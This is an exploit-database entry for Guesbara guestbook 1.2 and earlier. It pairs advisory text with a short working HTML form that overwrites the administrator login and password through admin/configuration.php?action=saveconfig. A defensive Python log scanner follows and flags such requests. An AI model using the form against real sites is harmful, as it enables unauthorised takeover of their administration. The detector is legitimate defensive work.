Guesbara - exploit.company
Vendor: Guesbara
By: Kacper
CVSS: 7.5 (HIGH)
CWE: Change administrative password
Product Name: Guesbara
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Guesbara <= 1.2 Change admin login & password exploit by Kacper

The Guesbara application is vulnerable to a flaw that allows attackers to change the administrative password. By exploiting this vulnerability, an attacker can gain administrative access to the affected application, leading to a complete compromise of the application.

Mitigation:

It is recommended to update to a patched version of the Guesbara application or apply any available security fixes provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html>
<title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>
<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>
<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td colspan=2 align=center>
<p> <input type='submit' name='submit' value='Zachowaj'> </p>
<p>by Kacper </p>
<p>for</p>
<p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p>&nbsp;</p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>
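
A defender-side check for the request the form above sends, added here as an example and not part of the original advisory: it scans web-server access logs for POSTs to admin/configuration.php?action=saveconfig whose Referer is missing or points at another host. The Combined Log Format, the host name guestbook.example and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed):
# ip - user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def is_saveconfig(target):
    """True if the request target is the config-save endpoint the PoC form posts to."""
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    return (url.path.lower().endswith("/admin/configuration.php")
            and query.get("action") == ["saveconfig"])

def suspicious_saves(lines, site_host):
    """Return (time, ip, reason) for config saves not submitted from the site's own pages."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_saveconfig(m["target"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-", "" or file: URLs
        if not ref_host:
            hits.append((m["time"], m["ip"], "missing or non-http referer"))
        elif ref_host != site_host.lower():
            hits.append((m["time"], m["ip"], "off-site referer: " + ref_host))
    return hits

# Constructed sample lines (documentation addresses and hosts, not real traffic).
_EP = "/guestbook_path/admin/configuration.php"
_FMT = '{ip} - - [12/Mar/2007:10:0{n}:00 +0000] "{req} HTTP/1.1" 200 512 "{ref}" "Mozilla/5.0"'
SAMPLE = [
    _FMT.format(ip="192.0.2.10", n=1, req="POST " + _EP + "?action=saveconfig&zapis=ok",
                ref="http://guestbook.example" + _EP),
    _FMT.format(ip="198.51.100.7", n=2, req="POST " + _EP + "?action=saveconfig&zapis=ok",
                ref="http://other.example/form.html"),
    _FMT.format(ip="203.0.113.5", n=3, req="POST " + _EP + "?action=saveconfig&zapis=ok",
                ref="-"),
    _FMT.format(ip="192.0.2.10", n=4, req="GET " + _EP, ref="-"),
]

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE, "guestbook.example"):
        print(*hit, sep="  ")
```

A hit is a lead for review rather than proof of compromise, since some clients strip the Referer header; correlate it with an unexpected change to the stored admin login or e-mail.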